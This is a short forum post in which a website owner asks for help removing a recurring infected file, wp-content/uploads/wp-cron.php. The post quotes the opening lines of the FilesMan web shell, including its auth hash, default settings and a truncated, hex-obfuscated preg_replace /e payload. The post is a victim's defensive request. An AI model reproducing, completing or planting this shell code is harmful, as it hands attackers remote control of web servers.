Filesman hack
-
Hi
I’ve found an infected file on one of my client websites. The file is wp-content/uploads/wp-cron.php and the file begins with the following code:
<?php # Web Shell by oRb
$auth_pass = “bdfa762517dbee605ddea6ac0205b3ec”;
$color = “#df5”;
$default_action = ‘FilesMan’;
$default_use_ajax = true;
$default_charset = ‘Windows-1251’;
preg_replace(“/.*/e”,”\x65\x7……I’ve followed all the advice I could find online, I can’t find any base64_decode script and this is the only instance there is on my server.
I’ve changed all passwords, installed BulletProof security but this file just keeps coming back everytime I delete it!
None of my other client sites seem to have been infected.
Tearing my hair out!! Any advice gratefully received!
- The topic ‘Filesman hack’ is closed to new replies.